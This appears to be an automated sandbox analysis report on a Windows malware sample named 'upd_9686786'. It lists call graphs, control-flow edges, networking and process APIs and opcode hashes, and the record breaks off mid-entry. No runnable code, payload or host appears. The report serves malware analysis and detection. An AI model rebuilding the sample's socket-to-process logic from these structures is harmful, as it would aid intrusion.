                                                                                                                    execution_graph 1053 7ff76e655d77 CreateProcessA 1054 7ff76e653428 1058 7ff76e6550b5 1054->1058 1056 7ff76e65342d malloc 1057 7ff76e653478 1056->1057 1059 7ff76e6550c4 1058->1059 1059->1056 1060 7ff76e655a5a 1061 7ff76e655a70 1060->1061 1062 7ff76e655a60 1060->1062 1062->1061 1063 7ff76e65568f recv 1062->1063 1064 7ff76e6556f1 1063->1064 1099 7ff76e65450a 1100 7ff76e65568b recv 1099->1100 1101 7ff76e65451d 1100->1101 1102 7ff76e653b72 SleepEx 1101->1102 1106 7ff76e654526 1101->1106 1103 7ff76e653e59 socket 1102->1103 1104 7ff76e653b90 1102->1104 1109 7ff76e653e7c 1103->1109 1105 7ff76e653e3e closesocket 1104->1105 1108 7ff76e653b96 1104->1108 1105->1103 1107 7ff76e65568b recv 1106->1107 1106->1109 1107->1109 1110 7ff76e653b6a 1111 7ff76e653b72 SleepEx 1110->1111 1112 7ff76e653e59 socket 1111->1112 1113 7ff76e653b90 1111->1113 1116 7ff76e653e7c 1112->1116 1114 7ff76e653e3e closesocket 1113->1114 1115 7ff76e653b96 1113->1115 1114->1112 1065 7ff76e652514 CreatePipe 1066 7ff76e6525ad 1065->1066 1067 7ff76e654196 connect 1068 7ff76e653b72 SleepEx 1067->1068 1072 7ff76e6541bc 1067->1072 1069 7ff76e653e59 socket 1068->1069 1070 7ff76e653b90 1068->1070 1074 7ff76e653e7c 1069->1074 1071 7ff76e653e3e closesocket 1070->1071 1073 7ff76e653b96 1070->1073 1071->1069 1075 7ff76e654c66 1076 7ff76e65450a 1075->1076 1077 7ff76e654c71 1075->1077 1088 7ff76e65568b 1076->1088 1079 7ff76e65451d 1080 7ff76e654526 1079->1080 1081 7ff76e653b72 SleepEx 1079->1081 1085 7ff76e65568b recv 1080->1085 1087 7ff76e653e7c 1080->1087 1082 7ff76e653e59 socket 1081->1082 1083 7ff76e653b90 1081->1083 1082->1087 1084 7ff76e653e3e closesocket 1083->1084 1086 7ff76e653b96 1083->1086 1084->1082 1085->1087 1089 7ff76e65568f recv 1088->1089 1090 7ff76e6556f1 1089->1090 1090->1079 1117 7ff76e6543ef 1118 7ff76e65440d 1117->1118 1119 7ff76e653b72 SleepEx 1118->1119 1123 7ff76e654417 1118->1123 1120 7ff76e653e59 socket 1119->1120 1121 7ff76e653b90 1119->1121 1125 7ff76e653e7c 1120->1125 1122 7ff76e653e3e closesocket 1121->1122 1124 7ff76e653b96 1121->1124 1122->1120 1091 7ff76e6537d0 1092 7ff76e653a8d ReadFile 1091->1092 1093 7ff76e653ad9 1092->1093 1094 7ff76e6542d2 1098 7ff76e6550ad 1094->1098 1096 7ff76e6542f0 send 1097 7ff76e65435c 1096->1097

                                                                                                                    Callgraph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    • Opacity -> Relevance
                                                                                                                    • Disassembly available
                                                                                                                    callgraph 0 Function_00007FF76E65568B 60 Function_00007FF76E655848 0->60 1 Function_00007FF76E656C0C 2 Function_00007FF76E65470E 3 Function_00007FF76E652288 62 Function_00007FF76E652453 3->62 4 Function_00007FF76E651389 5 Function_00007FF76E65450A 5->0 11 Function_00007FF76E65407C 5->11 64 Function_00007FF76E653D54 5->64 6 Function_00007FF76E653993 7 Function_00007FF76E652514 75 Function_00007FF76E652A43 7->75 83 Function_00007FF76E652734 7->83 8 Function_00007FF76E651896 18 Function_00007FF76E655303 8->18 21 Function_00007FF76E651A86 8->21 34 Function_00007FF76E6561F3 8->34 35 Function_00007FF76E6548F3 8->35 79 Function_00007FF76E6550AD 8->79 9 Function_00007FF76E654196 9->11 9->64 10 Function_00007FF76E652D91 12 Function_00007FF76E656DFC 13 Function_00007FF76E655D77 14 Function_00007FF76E656978 15 Function_00007FF76E655279 16 Function_00007FF76E6537FA 16->6 17 Function_00007FF76E652C03 17->10 86 Function_00007FF76E655430 18->86 19 Function_00007FF76E651303 20 Function_00007FF76E651805 22 Function_00007FF76E651000 23 Function_00007FF76E656481 25 Function_00007FF76E65656B 23->25 24 Function_00007FF76E6531EB 91 Function_00007FF76E653298 24->91 39 Function_00007FF76E6565F5 25->39 26 Function_00007FF76E652FEC 54 Function_00007FF76E65455F 26->54 27 Function_00007FF76E651D6D 28 Function_00007FF76E651567 32 Function_00007FF76E652E6A 28->32 28->35 29 Function_00007FF76E655169 30 Function_00007FF76E6560E9 31 Function_00007FF76E653B6A 31->11 31->64 33 Function_00007FF76E6555EA 36 Function_00007FF76E6566F3 37 Function_00007FF76E6520F4 38 Function_00007FF76E655A75 40 Function_00007FF76E656876 40->14 41 Function_00007FF76E6543EF 41->11 41->64 41->79 42 Function_00007FF76E654EF0 88 Function_00007FF76E655BB2 42->88 43 Function_00007FF76E652971 44 Function_00007FF76E6552F1 45 Function_00007FF76E651A5B 46 Function_00007FF76E6530DB 63 Function_00007FF76E655DD3 46->63 47 Function_00007FF76E65105D 47->4 93 Function_00007FF76E6511A4 47->93 48 Function_00007FF76E6546DD 56 Function_00007FF76E656861 48->56 48->79 49 Function_00007FF76E655EDE 50 Function_00007FF76E654657 51 Function_00007FF76E6523DA 52 Function_00007FF76E655A5A 52->60 53 Function_00007FF76E654C66 53->0 53->11 53->64 54->50 55 Function_00007FF76E6555DF 57 Function_00007FF76E6567CB 58 Function_00007FF76E65254D 58->75 58->83 59 Function_00007FF76E652E4E 59->88 61 Function_00007FF76E652049 61->37 65 Function_00007FF76E655654 66 Function_00007FF76E6516D6 89 Function_00007FF76E654C9D 66->89 67 Function_00007FF76E6537D0 68 Function_00007FF76E6542D2 68->79 69 Function_00007FF76E6562D2 69->23 69->36 70 Function_00007FF76E65603B 71 Function_00007FF76E65283C 72 Function_00007FF76E655F39 72->70 73 Function_00007FF76E6567B9 74 Function_00007FF76E651BBA 74->27 74->61 74->88 90 Function_00007FF76E651F98 74->90 75->17 76 Function_00007FF76E65533F 76->86 77 Function_00007FF76E654A40 78 Function_00007FF76E6567C2 80 Function_00007FF76E653627 81 Function_00007FF76E653428 81->80 84 Function_00007FF76E6550B5 81->84 82 Function_00007FF76E655F29 83->43 84->29 85 Function_00007FF76E651B2F 87 Function_00007FF76E651A32 92 Function_00007FF76E654DA3 94 Function_00007FF76E651020

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF76E653B6A Relevance: 4.8, APIs: 3, Instructions: 323networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleepclosesocketsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1397201513-0
                                                                                                                    • Opcode ID: 94b69f38999c093dae44a1891abfa34e2e9be6bd928ae543be3124dfe944e5d5
                                                                                                                    • Instruction ID: a309666c371db75caf73dfba03dc5efdc085832fbad0e505f32ede5a110a39ae
                                                                                                                    • Opcode Fuzzy Hash: 94b69f38999c093dae44a1891abfa34e2e9be6bd928ae543be3124dfe944e5d5
                                                                                                                    • Instruction Fuzzy Hash: 2BF16F72F08661CEF724DB75D8507ED37B2A744358F4041BADE4DA7B88DA389A81CB24
                                                                                                                    Function 00007FF76E65568B Relevance: 1.6, APIs: 1, Instructions: 94networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 239 7ff76e65568b-7ff76e6556eb recv 241 7ff76e65579f-7ff76e6557a2 239->241 242 7ff76e6556f1-7ff76e65579c call 7ff76e655848 239->242 244 7ff76e6557a4-7ff76e6557d9 241->244 245 7ff76e6557e0-7ff76e65581f 241->245 242->241 244->245 247 7ff76e655845-7ff76e655847 245->247 248 7ff76e655821-7ff76e65583f 245->248 248->247
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: recv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1507349165-0
                                                                                                                    • Opcode ID: 791e244315fc06028d538548ed3a024d295ae4e4d4409c79685b24c86601f63d
                                                                                                                    • Instruction ID: 63c4885219f874aaa626e6e459ea69b5487c917dc34f96266fb3cfdd903f1f39
                                                                                                                    • Opcode Fuzzy Hash: 791e244315fc06028d538548ed3a024d295ae4e4d4409c79685b24c86601f63d
                                                                                                                    • Instruction Fuzzy Hash: F8414D76F04621CEF714DBB5DC50BED37B2A748748F4081AADE4D63B88DA389A858F14
                                                                                                                    Function 00007FF76E651896 Relevance: .3, Instructions: 269COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d678a03ba1620f1f061fb041fd8b27c9f911aca453d9e8745f37b1a9bceb3f4f
                                                                                                                    • Instruction ID: c2a77521ab0c05608d6192b82b2d701c6a0463d4536653f275081b8b81c71f26
                                                                                                                    • Opcode Fuzzy Hash: d678a03ba1620f1f061fb041fd8b27c9f911aca453d9e8745f37b1a9bceb3f4f
                                                                                                                    • Instruction Fuzzy Hash: 6ED15F72F08661CEF724DB75DC407ED77B2A744348F4080B6DE4C67B49DA78AA818B24
                                                                                                                    Function 00007FF76E654196 Relevance: 3.2, APIs: 2, Instructions: 195networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 46 7ff76e654196-7ff76e6541b6 connect 47 7ff76e6541bc-7ff76e65420a 46->47 48 7ff76e653b72-7ff76e653b8a SleepEx 46->48 49 7ff76e65420c-7ff76e654218 47->49 50 7ff76e654242-7ff76e654249 47->50 51 7ff76e653e59-7ff76e653e76 socket 48->51 52 7ff76e653b90 48->52 53 7ff76e65421a-7ff76e65422e 49->53 54 7ff76e654232-7ff76e65423b 49->54 57 7ff76e65424b-7ff76e654251 50->57 58 7ff76e654294-7ff76e6542cc 50->58 55 7ff76e653e7c-7ff76e653ed7 call 7ff76e656e18 51->55 56 7ff76e654f01-7ff76e654f56 call 7ff76e656e40 51->56 59 7ff76e653e3e-7ff76e653e4e closesocket 52->59 60 7ff76e653b96-7ff76e653bca 52->60 53->54 54->50 73 7ff76e653ed9-7ff76e653efa 55->73 74 7ff76e653f00-7ff76e653f16 55->74 71 7ff76e654f58-7ff76e654f95 56->71 72 7ff76e654f99-7ff76e654fab 56->72 63 7ff76e654253-7ff76e65428e 57->63 64 7ff76e654291 57->64 59->51 65 7ff76e653bcc-7ff76e653c2f 60->65 66 7ff76e653c31-7ff76e653c3d 60->66 63->64 64->58 65->66 69 7ff76e653c96-7ff76e653c99 66->69 70 7ff76e653c3f-7ff76e653c92 call 7ff76e653d54 66->70 76 7ff76e653c9b-7ff76e653ca4 69->76 77 7ff76e653ca7-7ff76e653cd1 69->77 70->69 71->72 80 7ff76e654fad-7ff76e654fb9 72->80 81 7ff76e654fbf-7ff76e654fc6 72->81 73->74 88 7ff76e653f37-7ff76e653f9d call 7ff76e65407c 74->88 89 7ff76e653f18-7ff76e653f31 74->89 76->77 78 7ff76e653cfb-7ff76e653d05 77->78 79 7ff76e653cd3-7ff76e653cf4 77->79 84 7ff76e653d07-7ff76e653d0c 78->84 85 7ff76e653d10-7ff76e653d28 78->85 79->78 80->81 86 7ff76e654fc8-7ff76e655010 81->86 87 7ff76e655012-7ff76e65502c 81->87 84->85 90 7ff76e653d2a 85->90 91 7ff76e653d31-7ff76e653d53 85->91 86->87 92 7ff76e65502e-7ff76e65505f 87->92 93 7ff76e655066-7ff76e6550a3 87->93 97 7ff76e653fdc-7ff76e654031 88->97 98 7ff76e653f9f-7ff76e653fd6 88->98 89->88 90->91 92->93 99 7ff76e654033-7ff76e65403a 97->99 100 7ff76e654041-7ff76e65407b 97->100 98->97 99->100 100->56
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleepconnect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 238548546-0
                                                                                                                    • Opcode ID: 5d46df525b8571bf93a1d67ccb85f50759179d789b6d2bd50af01d4b5f6cc54e
                                                                                                                    • Instruction ID: 5ea9f7c253f13ee03abe60561a47a594702880d636919b145183ec9019c2eec1
                                                                                                                    • Opcode Fuzzy Hash: 5d46df525b8571bf93a1d67ccb85f50759179d789b6d2bd50af01d4b5f6cc54e
                                                                                                                    • Instruction Fuzzy Hash: 5B915C72F04610CEF314DFB5D8407AC77B2A744758F5081BADE4D63B98DA38A951CB24
                                                                                                                    Function 00007FF76E65450A Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 101 7ff76e65450a-7ff76e654520 call 7ff76e65568b 104 7ff76e654526-7ff76e65452d 101->104 105 7ff76e653b72-7ff76e653b8a SleepEx 101->105 108 7ff76e654533-7ff76e65455d call 7ff76e65568b 104->108 109 7ff76e654f01-7ff76e654f56 call 7ff76e656e40 104->109 106 7ff76e653e59-7ff76e653e76 socket 105->106 107 7ff76e653b90 105->107 106->109 111 7ff76e653e7c-7ff76e653ed7 call 7ff76e656e18 106->111 112 7ff76e653e3e-7ff76e653e4e closesocket 107->112 113 7ff76e653b96-7ff76e653bca 107->113 108->109 119 7ff76e654f58-7ff76e654f95 109->119 120 7ff76e654f99-7ff76e654fab 109->120 127 7ff76e653ed9-7ff76e653efa 111->127 128 7ff76e653f00-7ff76e653f16 111->128 112->106 116 7ff76e653bcc-7ff76e653c2f 113->116 117 7ff76e653c31-7ff76e653c3d 113->117 116->117 122 7ff76e653c96-7ff76e653c99 117->122 123 7ff76e653c3f-7ff76e653c92 call 7ff76e653d54 117->123 119->120 125 7ff76e654fad-7ff76e654fb9 120->125 126 7ff76e654fbf-7ff76e654fc6 120->126 130 7ff76e653c9b-7ff76e653ca4 122->130 131 7ff76e653ca7-7ff76e653cd1 122->131 123->122 125->126 135 7ff76e654fc8-7ff76e655010 126->135 136 7ff76e655012-7ff76e65502c 126->136 127->128 143 7ff76e653f37-7ff76e653f9d call 7ff76e65407c 128->143 144 7ff76e653f18-7ff76e653f31 128->144 130->131 133 7ff76e653cfb-7ff76e653d05 131->133 134 7ff76e653cd3-7ff76e653cf4 131->134 139 7ff76e653d07-7ff76e653d0c 133->139 140 7ff76e653d10-7ff76e653d28 133->140 134->133 135->136 141 7ff76e65502e-7ff76e65505f 136->141 142 7ff76e655066-7ff76e6550a3 136->142 139->140 145 7ff76e653d2a 140->145 146 7ff76e653d31-7ff76e653d53 140->146 141->142 150 7ff76e653fdc-7ff76e654031 143->150 151 7ff76e653f9f-7ff76e653fd6 143->151 144->143 145->146 152 7ff76e654033-7ff76e65403a 150->152 153 7ff76e654041-7ff76e65407b 150->153 151->150 152->153 153->109
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleeprecv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 711674940-0
                                                                                                                    • Opcode ID: 37cb74850d26e6203b063bc812a73826d3e4cb8ecff5cccc3d81f9dbea852fa0
                                                                                                                    • Instruction ID: 589a441a7ff3a8ec276d4fb13ed68eecbc456f4b5871bb17951f487308b66c94
                                                                                                                    • Opcode Fuzzy Hash: 37cb74850d26e6203b063bc812a73826d3e4cb8ecff5cccc3d81f9dbea852fa0
                                                                                                                    • Instruction Fuzzy Hash: A8B15172F04661CEF724DB75D8407EC33B2A744358F4041BADE4DA7B98DA78AA81CB24
                                                                                                                    Function 00007FF76E6543EF Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 154 7ff76e6543ef-7ff76e654411 call 7ff76e6550ad 157 7ff76e654417-7ff76e654459 154->157 158 7ff76e653b72-7ff76e653b8a SleepEx 154->158 159 7ff76e65445b-7ff76e654495 157->159 160 7ff76e654499-7ff76e6544a9 157->160 161 7ff76e653e59-7ff76e653e76 socket 158->161 162 7ff76e653b90 158->162 159->160 163 7ff76e6544ab-7ff76e6544d5 160->163 164 7ff76e6544dc-7ff76e6544ee 160->164 165 7ff76e653e7c-7ff76e653ed7 call 7ff76e656e18 161->165 166 7ff76e654f01-7ff76e654f56 call 7ff76e656e40 161->166 167 7ff76e653e3e-7ff76e653e4e closesocket 162->167 168 7ff76e653b96-7ff76e653bca 162->168 163->164 170 7ff76e654504-7ff76e654505 164->170 171 7ff76e6544f0-7ff76e654501 164->171 181 7ff76e653ed9-7ff76e653efa 165->181 182 7ff76e653f00-7ff76e653f16 165->182 179 7ff76e654f58-7ff76e654f95 166->179 180 7ff76e654f99-7ff76e654fab 166->180 167->161 173 7ff76e653bcc-7ff76e653c2f 168->173 174 7ff76e653c31-7ff76e653c3d 168->174 171->170 173->174 177 7ff76e653c96-7ff76e653c99 174->177 178 7ff76e653c3f-7ff76e653c92 call 7ff76e653d54 174->178 184 7ff76e653c9b-7ff76e653ca4 177->184 185 7ff76e653ca7-7ff76e653cd1 177->185 178->177 179->180 188 7ff76e654fad-7ff76e654fb9 180->188 189 7ff76e654fbf-7ff76e654fc6 180->189 181->182 196 7ff76e653f37-7ff76e653f9d call 7ff76e65407c 182->196 197 7ff76e653f18-7ff76e653f31 182->197 184->185 186 7ff76e653cfb-7ff76e653d05 185->186 187 7ff76e653cd3-7ff76e653cf4 185->187 192 7ff76e653d07-7ff76e653d0c 186->192 193 7ff76e653d10-7ff76e653d28 186->193 187->186 188->189 194 7ff76e654fc8-7ff76e655010 189->194 195 7ff76e655012-7ff76e65502c 189->195 192->193 198 7ff76e653d2a 193->198 199 7ff76e653d31-7ff76e653d53 193->199 194->195 200 7ff76e65502e-7ff76e65505f 195->200 201 7ff76e655066-7ff76e6550a3 195->201 205 7ff76e653fdc-7ff76e654031 196->205 206 7ff76e653f9f-7ff76e653fd6 196->206 197->196 198->199 200->201 207 7ff76e654033-7ff76e65403a 205->207 208 7ff76e654041-7ff76e65407b 205->208 206->205 207->208 208->166
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: e283b88006e450f80ec96e91abc3be5deda5fe8bbd1de692f4baf3d358240bf6
                                                                                                                    • Instruction ID: 0f513793c609334d052083eae4697abc2be256b06ede3d1d340f794bdfa37add
                                                                                                                    • Opcode Fuzzy Hash: e283b88006e450f80ec96e91abc3be5deda5fe8bbd1de692f4baf3d358240bf6
                                                                                                                    • Instruction Fuzzy Hash: 35912A76F04611CEF714DFB5D840BAC73B2A744758F5080BADE4DA7B88DA38A951CB24
                                                                                                                    Function 00007FF76E655A5A Relevance: 1.6, APIs: 1, Instructions: 102networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: recv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1507349165-0
                                                                                                                    • Opcode ID: 91d64ca66c471347d8d74566ad20c5159684f8f073e9bc6a12cada6ca3833ba3
                                                                                                                    • Instruction ID: a0d0f8a223d06be53cd143c0d292b3c02668664d31b2ea996084b7a6806d3566
                                                                                                                    • Opcode Fuzzy Hash: 91d64ca66c471347d8d74566ad20c5159684f8f073e9bc6a12cada6ca3833ba3
                                                                                                                    • Instruction Fuzzy Hash: 2D415F76F04621CEF714DBB5DC54BED73B2A744748F4080B6DE4DA3B88DA389A858B24
                                                                                                                    Function 00007FF76E652514 Relevance: 1.6, APIs: 1, Instructions: 98pipeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreatePipe
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2719314638-0
                                                                                                                    • Opcode ID: 2028910728e95217fe6049109da53333d88b96834b05290c622d7526b96f1247
                                                                                                                    • Instruction ID: 2f3f30b3c961768fc0890cc29d3e0fdde47bea49f0049fca6131cb212f6675b9
                                                                                                                    • Opcode Fuzzy Hash: 2028910728e95217fe6049109da53333d88b96834b05290c622d7526b96f1247
                                                                                                                    • Instruction Fuzzy Hash: FF414F76F04661CEF724DB75DC407EC73B2A745348F4081A6DE0DA7B88CA38AA80CB65
                                                                                                                    Function 00007FF76E6542D2 Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 249 7ff76e6542d2-7ff76e65435a call 7ff76e6550ad send 252 7ff76e65435c-7ff76e65437a 249->252 253 7ff76e65437d-7ff76e654384 249->253 252->253 254 7ff76e6543ac-7ff76e6543e2 253->254 255 7ff76e654386-7ff76e6543a5 253->255 255->254
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.34844693405.00007FF76E651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76E650000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.34844652124.00007FF76E650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844740858.00007FF76E657000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844777121.00007FF76E659000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844816670.00007FF76E65C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff76e650000_upd_9686786.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: send
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2809346765-0
                                                                                                                    • Opcode ID: 361358741b24178b0fa74cdce2c07cab7a2c23279fe57aa56eac6bc2aae8d422
                                                                                                                    • Instruction ID: 6dab408f08ec176c81857fda73cf65f5ff2e58d2435387b9781a889537763fd4
